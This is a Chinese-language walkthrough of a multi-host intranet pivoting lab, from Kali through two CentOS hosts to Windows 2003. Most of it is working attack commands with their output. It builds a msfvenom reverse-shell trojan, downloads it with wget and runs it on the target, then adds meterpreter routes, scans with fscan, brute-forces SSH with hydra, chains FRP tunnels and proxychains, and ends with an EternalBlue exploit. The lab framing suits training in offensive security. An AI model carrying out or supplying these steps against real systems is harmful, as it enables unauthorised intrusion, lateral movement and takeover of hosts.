多层内网穿透
一、环境搭建
1、丑陋的拓扑图
2、CentOS 1主机
网卡查询
#查看IP地址
[root@localhost ~]# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.0.2 netmask 255.255.255.0 broadcast 10.0.0.255
inet6 fe80::fee9:d6c:52e0:260b prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:4a:4e:87 txqueuelen 1000 (Ethernet)
RX packets 81 bytes 4860 (4.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55 bytes 4643 (4.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens36: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.88.146 netmask 255.255.255.0 broadcast 192.168.88.255
inet6 fe80::8840:3279:6aaa:5bd4 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:4a:4e:91 txqueuelen 1000 (Ethernet)
RX packets 74 bytes 8627 (8.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 70 bytes 8374 (8.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 6 bytes 324 (324.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 6 bytes 324 (324.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
通信测试
能通信kali和CentOS 2
3、CentOS 2主机
网卡查询
通信测试和开启
http
服务
能通信
CentOS 1
和Windwos 2003
4、Windows 2003主机
网卡查询
通信测试
能与
CentOS 2
通信
二、反弹shellCentOS 1
真实环境是你拿到了WEB服务器的最高权限,才进行内网横向渗透
这里直接跳过渗透和提权操作,直接开始内网穿透
1、制作木马
#制作木马
┌──(root㉿kali-3)-[/home/sword/shell]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f elf > centos1.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
#查看
┌──(root㉿kali-3)-[/home/sword/shell]
└─# ls
centos1.elf pingtunnel pingtunnel_INFO_2023-11-09.log pingtunnel_linux_amd64.zip windows.exe
#开启http服务
┌──(root㉿kali-3)-[/home/sword/shell]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
2、开启监听
3、运行木马
#下载木马
[root@localhost ~]# wget http://192.168.88.141/centos1.elf
--2023-11-09 03:18:21-- http://192.168.88.141/centos1.elf
Connecting to 192.168.88.141:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: ‘centos1.elf’
100%[====================================================================================>] 250 --.-K/s in 0s
2023-11-09 03:18:21 (74.5 MB/s) - ‘centos1.elf’ saved [250/250]
You have new mail in /var/spool/mail/root
#赋予执行权限
[root@localhost ~]# chmod +x centos1.elf
#后台运行木马
[root@localhost ~]# ./centos1.elf &
[1] 1466
4、主机上线
#查看上线主机
msf6 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux root @ localhost.localdomain 192.168.88.141:4444 -> 192.168.88.146:56328 (192.168.88.146
)
三、信息收集
1、网卡信息
#进入监听的Linux
msf6 > sessions 1
[*] Starting interaction with 1...
#查看权限
meterpreter > getuid
Server username: root
#查看网卡信息
meterpreter > ipconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : ens33
Hardware MAC : 00:0c:29:4a:4e:87
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.0.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::fee9:d6c:52e0:260b
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : ens36
Hardware MAC : 00:0c:29:4a:4e:91
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.88.146
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::8840:3279:6aaa:5bd4
IPv6 Netmask : ffff:ffff:ffff:ffff::
#生成会话路由,到时候好使用工具
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.0.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.88.0/255.255.255.0 from host's routing table.
#保存会话退出
meterpreter > bg
[*] Backgrounding session 1...
#查看会话路由
msf6 > route
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
10.0.0.0 255.255.255.0 Session 1
192.168.88.0 255.255.255.0 Session 1
[*] There are currently no IPv6 routes defined.
发现内网网端:10.0.0.0/24
2、上传fscan扫描工具
#上传工具
meterpreter > upload /home/sword/fscan_amd64
[*] Uploading : /home/sword/fscan_amd64 -> fscan_amd64
[*] Uploaded -1.00 B of 5.93 MiB (0.0%): /home/sword/fscan_amd64 -> fscan_amd64
[*] Completed : /home/sword/fscan_amd64 -> fscan_amd64
#进入命令行界面
meterpreter > shell
Process 2299 created.
Channel 2 created.
#赋予执行权限
chmod +x fscan_amd64
#查看是否有执行权限
ls -l
total 6088
-rw-------. 1 root root 2600 Dec 5 2022 anaconda-ks.cfg
-rwxr-xr-x 1 root root 250 Nov 9 04:07 centos1.elf
-rwxr-xr-x 1 root root 6217056 Nov 9 04:31 fscan_amd64
-rw-------. 1 root root 2048 Dec 5 2022 original-ks.cfg
drwxrwxr-x. 6 root root 4096 Nov 6 02:05 redis-5.0.4
3、主机发现
#扫描存活主机
./fscan_amd64 -h 10.0.0.0/24
发现主机0.4主机
端口发现
爆破密码
四、开启代理进入内网
1、使用MSF代理模块
#退出shell
exit
#退出到msf下
meterpreter > bg
[*] Backgrounding session 1...
#进入代理模块
msf6 > use auxiliary/server/socks_proxy
#查看代理必要参数
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local
#代理端口为1080
machine or 0.0.0.0 to listen on all addresses.
SRVPORT 1080 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
#启动代理模块
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
#查看后台运行模块
jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
#监听模块
0 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://192.168.88.141:4444
#代理模块
1 Auxiliary: server/socks_proxy
2、修改配置文件
这里我的kali是新开了一个bash窗口去修改文件的最下方
┌──(root㉿kali-3)-[/home/sword]
└─# vim /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
3、SSH爆破
新开窗口
┌──(root?kali-3)-[/home/sword]
└─# proxychains hydra -l root -P /home/sword/top500.txt 10.0.0.4 ssh -t 6
这里真实情况应该找系统漏洞或者web漏洞,拿到webshell之后进行提权
五、搭建隧道
1、FRP下载
- 下载地址:
https://github.com/fatedier/frp/releases/tag/v0.52.3
- 中文文档:
https://github.com/fatedier/frp/blob/dev/README_zh.md
温馨提示:
如果你的攻击机是Linux,跳板机是Windows,那么你就要下载一个Linux的还要下载一个windows版本的
如果两台都是Linux就直接下载Linux的就行了
2、工具安装
这是我新开的会话窗口
3、修改配置文件
这里有个坑,可以使用后面FRP第二种搭建隧道方法
#管理端口为7000
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat frps.toml
bindPort = 7000
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat frpc.toml
#跳板机IP
serverAddr = "192.168.88.146"
#跳板机端口
serverPort = 7000
[[proxies]]
#名字
name = "centos1-tcp"
#使用的协议
type = "tcp"
#本地地址
localIP = "127.0.0.1"
#本地端口
localPort = 1000
#跳板机开启的隧道端口
remotePort = 2000
7000是指:FRP连接的端口
1000是指:KALI和跳板机连接隧道开启的端口
2000是指:跳板机和KALI开启的端口
4、上传工具
#进入session 1
msf6 > sessions 1
] Starting interaction with 1...
#上传FRP
meterpreter > upload /home/sword/frp_0.52.3_linux_amd64.tar.gz
[*] Uploading : /home/sword/frp_0.52.3_linux_amd64.tar.gz -> frp_0.52.3_linux_amd64.tar.gz
[*] Uploaded -1.00 B of 11.24 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64.tar.gz -> frp_0.52.3_linux_amd64.tar.gz
[*] Uploaded -1.00 B of 11.24 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64.tar.gz -> frp_0.52.3_linux_amd64.tar.gz
[*] Completed : /home/sword/frp_0.52.3_linux_amd64.tar.gz -> frp_0.52.3_linux_amd64.tar.gz
#进入bash
meterpreter > shell
Process 1421 created.
Channel 6 created.
#模拟交互
python -c "import pty;pty.spawn('/bin/bash')"
#解压
[root@localhost ~]# tar -xf frp_0.52.3_linux_amd64.tar.gz
tar -xf frp_0.52.3_linux_amd64.tar.gz
#编辑配置文件
[root@localhost ~]# vim frp_0.52.3_linux_amd64/frpc.toml
vim frp_0.52.3_linux_amd64/frpc.toml
这里发现用vim编辑配置文件很难受,所以我准备在kali上编辑好之后,直接上传过去
#拷贝配置文件
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cp frpc.toml centos1.toml
#编辑文件
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# vim centos1.toml
#查看文件
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat centos1.toml
#centos2地址
serverAddr = "10.0.0.4"
#管理端口
serverPost = 7000
[[proxies]]
#名字
name = "centos2-tcp"
#协议
type = "tcp"
#本机地址
localIP = "127.0.0.1"
#本地端口
localPost = 2000
#对方端口
remotePost = 3000
#进入session 1
msf6 > sessions 1
[*] Starting interaction with 1...
#上传配置文件 #MSF上传配置文件
meterpreter > upload /home/sword/frp_0.52.3_linux_amd64/centos1.toml
[*] Uploading : /home/sword/frp_0.52.3_linux_amd64/centos1.toml -> centos1.toml
[*] Uploaded -1.00 B of 148.00 B (-0.68%): /home/sword/frp_0.52.3_linux_amd64/centos1.toml -> centos1.toml
[*] Completed : /home/sword/frp_0.52.3_linux_amd64/centos1.toml -> centos1.toml
5、与centos1建立隧道
这里是
kali
与centos 1
建立隧道
#进入bash
meterpreter > shell
Process 1681 created.
Channel 8 created.
#后台运行FRP
./frp_0.52.3_linux_amd64/frps -c frps.toml &
2023/11/09 21:39:43 [I] [root.go:102] frps uses config file: frps.toml
2023/11/09 21:39:43 [I] [service.go:200] frps tcp listen on 0.0.0.0:7000
2023/11/09 21:39:43 [I] [root.go:111] frps started successfully
新开窗口运行客户端
#后台运行
┌──(root?kali-3)-[~sword/frp_0.52.3_linux_amd64]
└─# ./frpc -c frpc.toml &
[1] 51236
2023/11/10 16:44:46 [I] [root.go:139] start frpc service for config file [frpc.toml]
2023/11/10 16:44:46 [I] [service.go:299] [2e44ab36c7cd1b9e] login to server success, get run id [2e44ab36c7cd1b9e]
2023/11/10 16:44:46 [I] [proxy_manager.go:156] [2e44ab36c7cd1b9e] proxy added: [TCP]
2023/11/10 16:44:46 [I] [control.go:173] [2e44ab36c7cd1b9e] [TCP] start proxy success
6、生成路由
这里生成路由和启用代理模块是因为我把
kali
关机过,之前只是临时生成的路由
#退出bash模式
exit
#生成路由
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.0.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.88.0/255.255.255.0 from host's routing table.
#保存会话退出
meterpreter > bg
[*] Backgrounding session 1...
#代理模块
msf6 > use auxiliary/server/socks_proxy
#启用
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
7、与centos2建立隧道
上传FRP
#上传FRP
┌──(root㉿kali-3)-[~sword/frp_0.52.3_linux_amd64]
└─# proxychains scp /home/sword/frp_0.52.3_linux_amd64.tar.gz root@10.0.0.4:/root
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.0.4:22 ... OK
root@10.0.0.4's password:
frp_0.52.3_linux_amd64.tar.gz 100% 11MB 312.2KB/s 00:36
#ssh连接centos2
┌──(root㉿kali-3)-[~sword/frp_0.52.3_linux_amd64]
└─# proxychains ssh root@10.0.0.4
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.0.4:22 ... OK
#输入密码
root@10.0.0.4's password:
Last login: Fri Nov 10 14:02:34 2023 from 10.0.0.2
#解压
[root@CentOS-2 ~]# tar -xf frp_0.52.3_linux_amd64.tar.gz
#进入文件夹
[root@CentOS-2 ~]# cd frp_0.52.3_linux_amd64
#运行服务端
[root@CentOS-2 frp_0.52.3_linux_amd64]# ./frps -c frps.toml &
[1] 2213
[root@CentOS-2 frp_0.52.3_linux_amd64]# 2023/11/10 14:29:27 [I] [root.go:102] frps uses config file: frps.toml
2023/11/10 14:29:27 [I] [service.go:200] frps tcp listen on 0.0.0.0:7000
2023/11/10 14:29:27 [I] [root.go:111] frps started successfully
开启centos1的客户端
六、MSF上线centos 2
1、生成木马
反弹的地址是
centos 1
端口是2000
2、上传木马
3、kali开启监听
msf6 > handler -p linux/x64/meterpreter/reverse_tcp -H 0.0.0.0 -P 1000
[*] Payload handler running as background job 4.
[*] Started reverse TCP handler on 0.0.0.0:1000
msf6 > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://192.168.88.141:4444
1 Auxiliary: server/socks_proxy
4 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://0.0.0.0:1000
4、运行木马
5、centos2主机上线
6、FRP隧道拓扑图
文字说明:
Windows 2003
----->172.168.0.128:3000
(CentOS2
)的时候就会把数据包发给
10.0.0.2:2000
(CentOS1
)然后又会把数据包转发给
192.168.88.141:1000
(kali
)
七、Windows 2003
1、网卡信息
发现有172.168.0.0/24网段
2、fscan扫描工具
#上传工具
meterpreter > upload /home/sword/fscan_amd64
[*] Uploading : /home/sword/fscan_amd64 -> fscan_amd64
[*] Uploaded -1.00 B of 5.93 MiB (0.0%): /home/sword/fscan_amd64 -> fscan_amd64
[*] Completed : /home/sword/fscan_amd64 -> fscan_amd64
#进入bash
meterpreter > shell
Process 3895 created.
Channel 2 created.
#模拟交互环境
python -c "import pty;pty.spawn('/bin/bash')"
#赋予执行权限
[root@CentOS-2 ~]# chmod +x fscan_amd64
chmod +x fscan_amd64
#扫描网段
[root@CentOS-2 ~]# ./fscan_amd64 -h 172.168.0.0/24
3、发现主机和端口
4、WEB服务
5、系统漏洞和爆破
八、永恒之蓝漏(MS17-010)
1、隧道搭建
因为kali只有一个
1000
端口的隧道,而且现在被CenOS 2
的shell
占用着
而且两个使用的payload
都不一样,所以Windows 2003
的shell反弹不了1000
端口,
做实验时没想到,这里顺便写一下FRP
的第二种搭建方式首先我们肯定要把
kali
上的FRP
服务关掉,CentOS 1
的FRP
客户端和服务端也关掉
启用CentOS 1的FRP
这里的141是kali的IP地址
2、环境复原
因为隧道没了所以
CentOS 2
掉线了,监听端口在,可以直接去CentOS 2
去运行一下木马
重新制作木马
上传木马,上传之前记得把之前那个木马删除了
运行木马
./centos2.elf &
监听kali的2000端口
路由添加
3、漏洞利用模块
4、修改参数
5、查看参数
6、运行exp
最终拿下最后一台的shell,就完成了多层内网渗透,真实情况比这个复杂的多的多